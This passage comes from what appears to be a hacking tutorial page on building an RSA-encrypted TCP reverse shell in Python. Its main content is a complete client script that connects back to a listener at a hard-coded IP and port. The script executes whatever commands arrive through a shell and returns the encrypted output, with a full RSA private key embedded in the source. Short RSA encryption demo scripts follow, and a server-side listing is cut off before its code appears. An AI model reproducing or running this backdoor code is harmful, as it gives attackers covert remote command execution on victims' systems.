[18](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-18)
[19](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-19)
[20](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-20)
[21](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-21)
[22](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-22)
[23](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-23)
[24](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-24)
[25](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-25)
[26](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-26)
[27](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-27)
[28](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-28)
[29](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-29)
[30](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-30)
[31](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-31)
[32](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-32)
[33](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-33)
[34](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-34)
[35](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-35)
[36](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-36)
[37](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-37)
[38](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-38)
[39](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-39)
[40](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-40)
[41](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-41)
[42](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-42)
[43](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-43)
[44](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-44)
[45](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-45)
[46](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-46)
[47](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-47)
[48](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-48)
[49](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-49)
[50](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-50)
[51](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-51)
[52](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-52)
[53](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-53)
[54](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-54)
[55](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-55)
[56](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-56)
[57](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-57)
[58](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-58)
[59](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-59)
[60](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-60)
[61](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-61)
[62](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-62)
[63](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-63)
[64](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-64)
[65](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-65)
[66](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-66)
[67](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-67)
[68](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-68)
[69](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-69)
[70](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-70)
[71](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-71)
[72](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-72)
[73](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-73)
[74](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-74)
[75](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-75)
[76](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-76)
[77](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-77)
[78](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-78)
[79](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-79)
[80](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-80)
[81](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-81)
[82](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-82)
[83](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-83)
[84](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-84)
[85](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-85)
[86](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-86)
[87](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-87)
[88](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-88)
[89](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-89)
[90](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-90)
[91](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-91)
[92](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-92)
[93](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-93)
[94](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-94)
[95](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-95)
[96](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-96)
[97](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-97)
[98](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-98)
[99](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-99)
[100](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-100)
[101](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-101)
[102](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-102) | `import subprocess import socket from Cryptodome.Cipher import PKCS1_OAEP from Cryptodome.PublicKey import RSA def decrypt(cipher): privatekey = '''-----BEGIN RSA PRIVATE KEY----- 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 -----END RSA PRIVATE KEY-----''' private_key = RSA.importKey(privatekey) decryptor = PKCS1_OAEP.new(private_key) return decryptor.decrypt(cipher).decode() def encrypt(message): publickey = '''-----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEApceMHQ9c5Cdf+qgd4ASP M7WNbKavEwat78bMHQVK6cRNm2XSWCLpTsYN2eUALV++dYi2Im0T92bqYojRm+p4 vVKOvrdmcmfnITEw/++pbvGZYRf2y0zsSJi1Mi+lfgQs56QXBMIU6IdeCL2C7cex 9LNJ98ipGeN6nBiaExI9he3PcivztD5vHowCwkbzAnpZgPamrN10/KukWKvJ3t05 bc0MskjkhVaaN55eidzAXUmYmxyoLeke1GssiU+TInZQXbSiUeeFsZpkMjYX4nCS xT/TuuFaDy6tfpfM+ePNEgeLjn7WAJh2ApxaYhmqwbDTsXd0ldHc4iNeGmlaEGE9 DgXPSp7ljV9SZ7eO9LZuiERz003NrUqSKSHdYgEIH8wZrCiKSP471oNYn0ye+KdV /v25dqTXApO3QO/LZrJQ8twQyASR1LB3tTVYGuNpRVLlNC4j4ivL22uDCbGOIBOa KDmu/QR5imLdjj3alVg69Ci3It3jTlubtHDaXTVs+i1133fOKMnRPLmCHE1/6MMS i1BzDF46Q2XJwjgDnH5rk70n7sVquQtpHZkpQsuSSrjiL9Bi3jYghReVfFHC7aNF p42v7EMaLohpnFm6yKiEm5UacMs7rLdnUQtAKo3r5UiNAegY6h/ZDncGhah1e5wF dBPIb9wJyTjPYTiTJ3rDQGECAwEAAQ== -----END PUBLIC KEY-----''' public_key = RSA.importKey(publickey) encryptor = PKCS1_OAEP.new(public_key) encryptedData = encryptor.encrypt(message) return encryptedData def connect(): s = socket.socket() s.connect(('192.168.0.152', 8080)) while True: command = s.recv(1024) command = decrypt(command) print (command) if 'terminte' in command: s.close() break else: CMD = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE) result = CMD.stdout.read() print (len(result)) if len(result) > 470: for i in range(0, len(result), 470): chunk = result[0+i:470+i] s.send(encrypt(chunk)) else: s.send(encrypt(result)) connect()` |
RSA Enc Big Message
-------------------
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-1)
[2](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-2)
[3](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-3)
[4](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-4)
[5](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-5)
[6](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-6)
[7](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-7)
[8](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-8)
[9](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-9)
[10](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-10)
[11](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-11)
[12](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-12)
[13](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-13)
[14](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-14)
[15](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-15)
[16](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-16)
[17](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-17)
[18](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-18)
[19](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-19)
[20](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-20)
[21](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-21)
[22](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-22)
[23](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-23)
[24](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-24)
[25](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-25)
[26](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-2-26) | `from Cryptodome.PublicKey import RSA from Cryptodome.Cipher import PKCS1_OAEP def decrypt(cipher): privatekey = open("private.pem", "rb") private_key = RSA.importKey(privatekey.read()) decryptor = PKCS1_OAEP.new(private_key) print (decryptor.decrypt(cipher).decode()) def encrypt(message): publickey = open("public.pem", "rb") public_key = RSA.importKey(publickey.read()) encryptor = PKCS1_OAEP.new(public_key) encrypted_data = encryptor.encrypt(message) print(encrypted_data) decrypt(encrypted_data) message = 'H'*500 if len(message) > 470: # To check the size limitation of messages, which is 470 bites when key size is 4096 bits for i in range(0, len(message), 470): # We will split the messages into chunks so it can be processed chunk = message[0+i:470+i] encrypt(chunk.encode()) else: encrypt(message.encode())` |
RSA Enc Small messages
----------------------
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-1)
[2](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-2)
[3](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-3)
[4](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-4)
[5](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-5)
[6](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-6)
[7](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-7)
[8](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-8)
[9](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-9)
[10](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-10)
[11](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-11)
[12](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-12)
[13](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-13)
[14](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-14)
[15](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-15)
[16](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-16)
[17](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-17)
[18](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-18)
[19](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-19)
[20](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-20)
[21](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-21)
[22](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-3-22) | `from Cryptodome.PublicKey import RSA from Cryptodome.Cipher import PKCS1_OAEP def encrypt(message): publickey = open("public.pem", "rb") public_key = RSA.importKey(publickey.read()) encryptor = PKCS1_OAEP.new(public_key) encrypted_data = encryptor.encrypt(message) print(encrypted_data) return encrypted_data message = 'H'*470 # Limitation on size of the clear text message is 470 bytes with a key size of 4096 bits encrypted_data = encrypt(message.encode()) def decrypt(cipher): privatekey = open("private.pem", "rb") private_key = RSA.importKey(privatekey.read()) decryptor = PKCS1_OAEP.new(private_key) print (decryptor.decrypt(cipher).decode()) decrypt(encrypted_data)` |
RSA Server side shell
---------------------
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-1)
[2](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-2)
[3](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-3)
[4](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-4)
[5](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-5)
[6](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-6)
[7](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-7)
[8](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-8)
[9](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-9)
[10](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-10)
[11](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-11)
[12](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-12)
[13](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-13)
[14](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-14)
[15](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-15)
[16](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-16)
[17](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-17)
[18](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-18)
[19](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-19)
[20](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-20)
[21](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-21)
[22](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-22)
[23](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-23)
[24](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-24)
[25](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-25)
[26](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-26)
[27](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-27)
[28](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-28)
[29](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-29)
[30](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-30)
[31](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-31)
[32](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-32)
[33](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-33)
[34](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-34)
[35](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-35)
[36](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-36)
[37](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-37)
[38](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-38)
[39](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-39)
[40](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-40)
